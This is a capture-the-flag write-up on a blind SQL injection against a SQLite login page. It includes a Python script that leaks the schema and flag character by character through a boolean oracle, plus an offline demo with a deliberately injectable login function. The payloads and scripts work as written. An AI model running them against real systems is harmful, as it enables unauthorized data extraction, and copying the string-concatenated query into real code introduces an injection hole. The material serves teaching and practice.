This is an SQL injection challenge, but the login endpoint ignores any request that does not carry the right cookie: the cookie name 416c6c6f77 is the hex encoding of "Allow", and it must be set to 54727565, the hex encoding of "True". Fuzzing showed that the backend is SQLite3, which means the whole schema is stored in the sqlite_master table (the CREATE statements live in its sql column). The response reflects whether the login succeeded or not, which gives a boolean oracle; we used it to leak the schema one character at a time with a LIKE prefix match, found a users table with a password column, and then leaked the password the same way to get the flag. Two properties of SQLite's LIKE matter here: % and _ are wildcards (% is dropped from the candidate set, while _ conveniently stands in for the spaces of "CREATE TABLE users"), and LIKE is case-insensitive for ASCII, so characters recovered this way should be confirmed with a case-sensitive comparison before the flag is submitted.
```
import string

import requests

# The gate: cookie 416c6c6f77 ("Allow" in hex) has to be 54727565 ("True" in hex),
# otherwise the server ignores the login request entirely.
cookies = {
    '416c6c6f77': '54727565',
}
headers = {
    'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'Origin': 'http://130.185.122.155:8080',
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Referer': 'http://130.185.122.155:8080/',
    'Accept-Language': 'en-US,en;q=0.9,id;q=0.8,fr;q=0.7',
}

# Candidate characters. '%' is a LIKE wildcard and would always match, so it is dropped.
# Note that '_' is a wildcard as well and LIKE is case-insensitive, so what this loop
# recovers needs a case-sensitive check before it is submitted.
yo = string.printable.replace("%", '')
print(yo)

# Prefix from the first pass, run against the sql column of sqlite_master
# ('_' matched the spaces in "CREATE TABLE users"); then the flag prefix leaked so far.
now = 'create_table_users'
now = 'RaziCTF{!snt_bl'

while True:
    for i in yo:
        data = {
            'uname': "1'or/**/(select (select group_concat(password) from users) LIKE '" + now + i + "%')-- -",
            'psw': 'a',
        }
        response = requests.post('http://130.185.122.155:8080/login', headers=headers, cookies=cookies, data=data, verify=False)
        # A successful login reflects "did" in the page: that is the boolean oracle.
        if 'did' in response.text:
            now = now + i
            print(now)
            break
    else:
        # No candidate extended the prefix, so the string is complete.
        break
print("done:", now)
```
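To make the oracle and the LIKE pitfalls concrete without the live target, here is an added example that is not part of the original writeup. It stands up an in-memory SQLite database with a users table and a login query that concatenates the username into SQL (the table layout, the flag value beyond the leaked prefix, and the function names are assumptions), reproduces the writeup's LIKE prefix leak and its 'create_table_users' trick, and then extracts the same strings with a case-sensitive single-character comparison that has no wildcards.

```python
import sqlite3
import string

# Constructed stand-in for the challenge backend (not the real server): one users
# table, one row, and a login handler that concatenates the username into SQL.
FLAG = "RaziCTF{!snt_bl1nd_Sql}"    # made-up value; only the prefix comes from the writeup
PASSWORD_SUBQ = "select group_concat(password) from users"
SCHEMA_SUBQ = "select group_concat(sql) from sqlite_master"
SCHEMA_SQL = "CREATE TABLE users(uname TEXT, password TEXT)"

# Candidate sets. The LIKE leak must not try '%' (always matches) or a quote (breaks
# the literal); whitespace is skipped to keep the pattern a single token.
LIKE_CHARSET = "".join(c for c in string.printable if c not in "%'" and not c.isspace())
EXACT_CHARSET = string.printable    # nothing is embedded as text, so every char is safe


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute(SCHEMA_SQL)
    con.execute("INSERT INTO users VALUES ('admin', ?)", (FLAG,))
    return con


def login_ok(con, uname, psw):
    """Vulnerable login: uname is string-concatenated, which is the bug being exploited."""
    sql = "SELECT 1 FROM users WHERE uname='%s' AND password='%s'" % (uname, psw)
    try:
        return con.execute(sql).fetchone() is not None
    except (sqlite3.Error, sqlite3.Warning):
        return False    # a broken query looks like a failed login, i.e. "false"


def oracle(con, condition):
    """Boolean oracle in the writeup's payload shape: 1'or/**/(<condition>)-- -"""
    return login_ok(con, "1'or/**/(" + condition + ")-- -", "a")


def leak_like(con, subq, charset=LIKE_CHARSET):
    """Prefix extraction with LIKE, the way the writeup does it."""
    known = ""
    while True:
        for c in charset:
            if oracle(con, "(%s) LIKE '%s%%'" % (subq, known + c)):
                known += c
                break
        else:
            return known    # no candidate extends the prefix: end of string


def leak_exact(con, subq, charset=EXACT_CHARSET):
    """Same oracle, but compares one character with = (BINARY collation, no wildcards)."""
    known = ""
    while True:
        pos = len(known) + 1
        for c in charset:
            if oracle(con, "substr((%s),%d,1)=char(%d)" % (subq, pos, ord(c))):
                known += c
                break
        else:
            return known    # substr() past the end yields '', which equals no char


if __name__ == "__main__":
    con = make_db()
    # the writeup's trick: '_' matches the spaces and LIKE ignores case
    print(oracle(con, "(%s) LIKE 'create_table_users%%'" % SCHEMA_SUBQ))
    print(leak_exact(con, SCHEMA_SUBQ))
    print(leak_like(con, PASSWORD_SUBQ))    # lower-cased, '{' and '}' come back as '_'
    print(leak_exact(con, PASSWORD_SUBQ))   # the exact flag
```

Running it shows the LIKE leak come back lower-cased with '{' and '}' turned into '_': the candidate order tries '_' before those characters, and '_' matches anything, so the wildcard is accepted as the "found" character. The substr()=char() variant returns the schema and the flag exactly, and re-running the oracle with that comparison for each position is a cheap way to confirm a LIKE-leaked flag on the live target.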